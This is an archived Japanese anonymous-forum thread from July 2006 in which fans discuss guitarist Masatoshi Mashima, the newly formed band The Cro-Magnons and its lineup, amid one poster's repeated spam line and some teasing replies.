216 :伝説の名無しさん:2006/07/18(火) 21:29:46
マーシー大好きっ子って複数いるんでは?

217 :伝説の名無しさん:2006/07/18(火) 21:43:53
>>209
アジア系は完全な黒目じゃないよ 普通はブラウン
人によっては明るい茶色もいる

218 :マーシー大好きっ子:2006/07/18(火) 21:45:43
マーシーアルバム出さないのかなぁ\(^O^)/

219 :マーシー大好きっ子:2006/07/19(水) 00:08:43
マーシーアルバム出さないのかなぁ\(^O^)/

220 :伝説の名無しさん:2006/07/19(水) 00:28:11
>>209
必死だね。

221 :伝説の名無しさん:2006/07/19(水) 02:50:25
>>209は「真島はロシア系在日」と言えば納得するだろうw


222 :マーシー大好きっ子:2006/07/19(水) 10:09:34
マーシーアルバム出さないのかなぁ\(^O^)/

223 :伝説の名無しさん:2006/07/19(水) 10:40:52
マーシー
http://6607.teacup.com/syuu/bbs

224 :マーシー大好きっ子:2006/07/19(水) 12:13:06
マーシーアルバム出さないのかなぁ\(^O^)/

225 :伝説の名無しさん:2006/07/19(水) 12:41:32
2ch以外でも大活躍ですか
そうですか

226 :伝説の名無しさん:2006/07/19(水) 13:21:21
>>221
それ何て布袋

227 :伝説の名無しさん:2006/07/19(水) 13:46:15
>>209は「マーシーってどこかの白人の血が混じっているよね?」
と、ここで自分と同じ考えの奴探しているんだよ。

228 :伝説の名無しさん:2006/07/19(水) 14:58:06
ディーディーラモーンにそっくりだよね。

229 :伝説の名無しさん:2006/07/19(水) 15:12:23
そっくりさん芸人真島

230 :伝説の名無しさん:2006/07/19(水) 16:54:20
だから柴田恭平に似てるよな

231 :伝説の名無しさん:2006/07/19(水) 16:58:07
今日の新聞のチーターの所に「真島」の名前が!と思ったが、よく考えたらマツケンサンバの彼の事なんだろーな

232 :伝説の名無しさん:2006/07/19(水) 17:00:50
ヒロトも一時期なりきりシドビシャスみたいだったな

233 :伝説の名無しさん:2006/07/19(水) 19:39:49
マーシークオーター?じゃなかった?

234 :伝説の名無しさん:2006/07/19(水) 20:29:32
>>232
今携帯の待ち受けそれ
マジでシドに似てる

235 :伝説の名無しさん:2006/07/19(水) 20:38:05
そりゃバームクーヘンのころか?
あのサイヤ人みたいな髪型

236 :伝説の名無しさん:2006/07/19(水) 20:55:47
サイヤ人?サイヤ人ではないだろ

237 :マーシー大好きっ子:2006/07/20(木) 00:09:02
マーシーアルバム出さないのかなぁ\(^O^)/

238 :伝説の名無しさん:2006/07/20(木) 00:23:31
カラーコンタクトならジュリーもやってたがな

239 :マーシー大好きっ子:2006/07/20(木) 00:43:18
マーシーアルバム出さないのかなぁ\(^O^)/

240 :伝説の名無しさん:2006/07/20(木) 01:23:47
芸大合格しますように
マーシーパワーをくれないか

241 :伝説の名無しさん:2006/07/20(木) 02:42:49
マーシー神社
恨みを持った奴が藁人形を持ち、供えている木に藁人形を打ちつける神社。
皮肉と恨みに満たされている。


242 :伝説の名無しさん:2006/07/20(木) 02:44:45
なにそれ

243 :マーシー大好きっ子:2006/07/20(木) 08:51:25
マーシーアルバム出さないのかなぁ\(^O^)/

244 :伝説の名無しさん:2006/07/20(木) 12:02:18
mixiで大活躍中・・・

245 :伝説の名無しさん:2006/07/20(木) 12:39:55
マーシーパワーとヒロトパワーで10000倍!
浪人はもういやじゃー

246 :マーシー大好きっ子:2006/07/20(木) 16:00:43
マーシーアルバム出さないのかなぁ\(^O^)/

247 :伝説の名無しさん:2006/07/20(木) 23:06:08
拝啓マーシー
23日、貴方が万国博記念公園もみじ川芝生広場に居なきゃ意味がない。
楽しみにしてるよぉー(。・ω・)ノ~

248 :伝説の名無しさん:2006/07/21(金) 00:28:18
↑ 何があるの?

249 :伝説の名無しさん:2006/07/21(金) 13:28:32
>248
MTWBがあるよ。毎年恒例のFM802のイベント。

250 :マーシー大好きっ子:2006/07/21(金) 15:09:13
マーシーアルバム出さないのかなぁ\(^O^)/

251 :マーシー大好きっ子:2006/07/22(土) 08:09:55
マーシーアルバム出さないのかなぁ\(^O^)/

252 :マーシー大好きっ子:2006/07/22(土) 10:17:45
マーシーアルバム出さないのかなぁ\(^O^)/

253 :伝説の名無しさん:2006/07/22(土) 10:52:28
>>マーシー大好きっ子
来月リリースするみたいだよ!よかったね!ぷりぷり!

254 :伝説の名無しさん:2006/07/22(土) 12:26:58
ヒロトも好きだなあ

255 :マーシー大好きっ子:2006/07/22(土) 15:00:13
マーシーアルバム出さないのかなぁ\(^O^)/

256 :伝説の名無しさん:2006/07/22(土) 16:14:52
[Vocal]甲本ヒロト(「ザ・ブルーハーツ」〜「ザ・ハイロウズ」)
[Guitar]真島昌利(「ザ・ブルーハーツ」〜「ザ・ハイロウズ」)
[Bass]
[Drums]梶原徹也(「ザ・ブルーハーツ」〜「ザ・スリー・ピース」〜「ザ・ビッグ・ヒップ」)
[Key]イトウミキオ


257 :マーシー大好きっ子:2006/07/22(土) 17:01:59
マーシーアルバム出さないのかなぁ\(^O^)/

258 :マーシー大好きっ子:2006/07/22(土) 19:10:01
マーシーアルバム出さないのかなぁ\(^O^)/

259 :伝説の名無しさん:2006/07/22(土) 20:29:59
あちこちのスレで宣伝してくれてるみたいだね。。。
むふふ

260 :マーシー大好きっ子:2006/07/22(土) 21:42:26
マーシーアルバム出さないのかなぁ\(^O^)/

261 :伝説の名無しさん:2006/07/23(日) 06:37:58
田代まさし>真島昌利

262 :マーシー大好きっ子:2006/07/23(日) 07:44:39
マーシーアルバム出さないのかなぁ\(^O^)/

263 :伝説の名無しさん:2006/07/23(日) 09:17:31
今日はマーシーが世界で一番カッコイイぜ♪
まぢ楽しみにしてるー

264 :伝説の名無しさん:2006/07/23(日) 09:55:05
>>マーシー大好きっ子
来月リリースするみたいだよ!よかったね!ぷりぷり!


265 :マーシー大好きっ子:2006/07/23(日) 10:17:52
マーシーアルバム出さないのかなぁ\(^O^)/

266 :伝説の名無しさん:2006/07/23(日) 10:37:07
>>マーシー大好きっ子
来月リリースするみたいだよ!よかったね!ぷりぷり!



267 :伝説の名無しさん:2006/07/23(日) 10:38:43
>>マーシー大好きっ子
来月リリースするみたいだよ!よかったね!ぷりぷり!



268 :伝説の名無しさん:2006/07/23(日) 10:40:37
>>マーシー大好きっ子
来月リリースするみたいだよ!よかったね!ぷりぷり!



269 :伝説の名無しさん:2006/07/23(日) 10:44:32
>>マーシー大好きっ子
来月リリースするみたいだよ!よかったね!ぷりぷり!



270 :まんこちっこ:2006/07/23(日) 11:00:45
>>マーシー大好きっ子
来月リリースするみたいだよ!よかったね!ぷりぷり!



271 :マーシー大好きっ子:2006/07/23(日) 11:54:13
マーシーアルバム出さないのかなぁ\(^O^)/

272 :マーシー大好きっ子:2006/07/23(日) 12:19:01
マーシーアルバム出さないのかなぁ\(^O^)/

273 :伝説の名無しさん:2006/07/23(日) 12:23:53
大変なことに・・・

274 :伝説の名無しさん:2006/07/23(日) 14:06:38
マーシーちょっと太ってたねェー

275 :伝説の名無しさん:2006/07/23(日) 14:33:05
ザ・クロマニヨンズ
http://www.cro-magnons.net/
http://www.bmgjapan.com/_artist/info.php?id=2114

甲本ヒロトVo.  (↑THE HIGH-LOWS↓) http://high-lows.net/
真島昌利G.   (↑THE HIGH-LOWS↓) http://high-lows.net/
小林勝B.(SOY SAUCE SONIX、SADS、nil) http://www.afro-skull.com/nil.html
桐田勝治Dr.(Gargoyle)  http://firstcell.net/gargoyle/paso_index.html

276 :伝説の名無しさん:2006/07/23(日) 16:15:07

ザ・クロマニヨンズ

http://www.youtube.com/watch?v=n7yzussID50
http://www.youtube.com/watch?v=7OyYiI4PMRk

277 :伝説の名無しさん:2006/07/23(日) 16:38:52
>>276
サンクス!!!
曲の感じは、甲本真島らしいけど、なんか今までと違うような感じもするな。


278 :伝説の名無しさん:2006/07/23(日) 17:56:33
ttp://page6.auctions.yahoo.co.jp/jp/auction/f48208771

279 :伝説の名無しさん:2006/07/23(日) 17:57:31
近所のツタヤ、マーシーのソロ作品をコンプリートしてたのに
いつの間にか全部なくなってた。。

280 :伝説の名無しさん:2006/07/23(日) 18:04:35
遊んでいたのは風の子供達
やじるしの帽子をかぶっていた



友部正人の未来予知。

281 :伝説の名無しさん:2006/07/23(日) 18:07:33
クロマニヨン・ストンプ
キラービー
タリホー
歩くチブ
弾丸ロック

282 :マーシー大好きっ子:2006/07/23(日) 18:48:14
マーシーアルバム出さないのかなぁ\(^O^)/

283 :伝説の名無しさん:2006/07/23(日) 18:51:00
クロマニパワーで芸大合格じゃい!

284 :伝説の名無しさん:2006/07/23(日) 19:46:41
>>276
やばい・・・嬉しすぎて涙出てきた・・・

285 :伝説の名無しさん:2006/07/23(日) 20:13:20
拭かなくていいぞ

286 :マーシー大好きっ子:2006/07/23(日) 20:30:13
マーシーアルバム出さないのかなぁ\(^O^)/

287 :伝説の名無しさん:2006/07/23(日) 20:57:17
キモイ

288 :マーシー大好きっ子:2006/07/23(日) 21:08:05
マーシーアルバム出さないのかなぁ\(^O^)/

289 :マーシー大好きっ子:2006/07/23(日) 22:13:38
マーシーアルバム出さないのかなぁ\(^O^)/

290 :伝説の名無しさん:2006/07/23(日) 23:09:10
まーしー

291 :伝説の名無しさん:2006/07/23(日) 23:14:08


292 :マーシー大好きっ子:2006/07/23(日) 23:42:43
マーシーアルバム出さないのかなぁ\(^O^)/

293 :マーシー大好きっ子:2006/07/24(月) 12:53:25
マーシーアルバム出さないのかなぁ\(^O^)/

294 :マーシー大好きっ子:2006/07/24(月) 22:02:03
マーシーアルバム出さないのかなぁ\(^O^)/

295 :マーシー大好きっ子:2006/07/25(火) 16:43:10
マーシーアルバム出さないのかなぁ\(^O^)/

296 :マーシー大好きっ子:2006/07/25(火) 17:37:26
マーシーアルバム出さないのかなぁ\(^O^)/

297 :マーシー大好きっ子:2006/07/25(火) 21:17:00
マーシーアルバム出さないのかなぁ\(^O^)/

298 :マーシー大好きっ子:2006/07/25(火) 22:33:56
マーシーアルバム出さないのかなぁ\(^O^)/

299 :伝説の名無しさん:2006/07/26(水) 04:09:29
767 :名無しさん@お腹いっぱい。:2006/07/25(火) 23:33:05 ID:Jze7xhnkO
てか真夏のストレートってよくまあまあ売れたよな。かなりマニアックというか、ハイロウズファンしか痺れなさ気な歌詞とメロディなのに。
769 :名無しさん@お腹いっぱい。:2006/07/25(火) 23:42:44 ID:0LXV3/nNO
何で真夏のストレートがそこそこ売れたのかわからない
あんな曲で金稼げるんだからいいよなぁって思った
779 :名無しさん@お腹いっぱい。:2006/07/26(水) 00:48:04 ID:Vc2dUecn0
ヒロトいらなくてマーcだけでとかいう奴はなんで?
マジ分からん
マーcは好きだしソロも聞くが
ヒロトの閃きや言葉の説得力、パフォの説得力の前には圧倒的に色褪せる

マーcにはまだ照れがあるろ
783 :名無しさん@お腹いっぱい。:2006/07/26(水) 01:14:33 ID:RqGsCASs0
>>779
ヒロトも好きだが、マーシーソロかマーシーボーカルが聴きたいんだよ。
ヒロトのカリスマ性は凄いが、しゃがれたマーシーボーカルにしか表せないものも沢山ある。
785 :名無しさん@お腹いっぱい。:2006/07/26(水) 01:22:45 ID:WLP+d0H20
ヒロトも一人じゃだめだよ
マーシーがあの声で一緒に歌うからいいんだ
ヒロトのソロ見たら分かるじゃん
二人合わさるとなぜか最強になる

真島昌利=金正日

300 :マーシー大好きっ子:2006/07/26(水) 07:55:38
マーシーアルバム出さないのかなぁ\(^O^)/

301 :伝説の名無しさん:2006/07/26(水) 12:08:16
>>299
可哀想にな。皆にいじめられちゃったんだね、よしよし

302 :マーシー大好きっ子:2006/07/26(水) 12:15:50
マーシーアルバム出さないのかなぁ\(^O^)/

303 :伝説の名無しさん:2006/07/26(水) 16:33:56
宵越しの 金持たねぇ
てやんでぇ しゃらくせぇ

勝っただの 負けただの
てやんでぇ しゃらくせぇ


304 :マーシー大好きっ子:2006/07/26(水) 19:18:07
マーシーアルバム出さないのかなぁ\(^O^)/

305 :伝説の名無しさん:2006/07/27(木) 04:24:47
>>301
それで煽ってるつもり?やはり真島オタはアホだなw

306 :伝説の名無しさん:2006/07/27(木) 04:33:55
>>301
理性があるのなら解るだろう
いじめる側に問題があることを


307 :マーシー大好きっ子:2006/07/27(木) 07:41:43
マーシーアルバム出さないのかなぁ\(^O^)/

308 :マーシー大好きっ子:2006/07/27(木) 19:00:30
マーシーアルバム出さないのかなぁ\(^O^)/

309 :伝説の名無しさん:2006/07/27(木) 21:43:58
ザ・クロマニヨンズで、早くマーシーヴォーカルが聴きたいです。
アルバムには入れてくれよー

310 :マーシー大好きっ子:2006/07/27(木) 22:20:31
マーシーアルバム出さないのかなぁ\(^O^)/

311 :マーシー大好きっ子:2006/07/28(金) 12:28:26
マーシーアルバム出さないのかなぁ\(^O^)/

312 :伝説の名無しさん:2006/07/28(金) 14:17:08
マーシー、また楽曲提供っすよ

313 :マーシー大好きっ子:2006/07/28(金) 15:18:07
マーシーアルバム出さないのかなぁ\(^O^)/

41 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)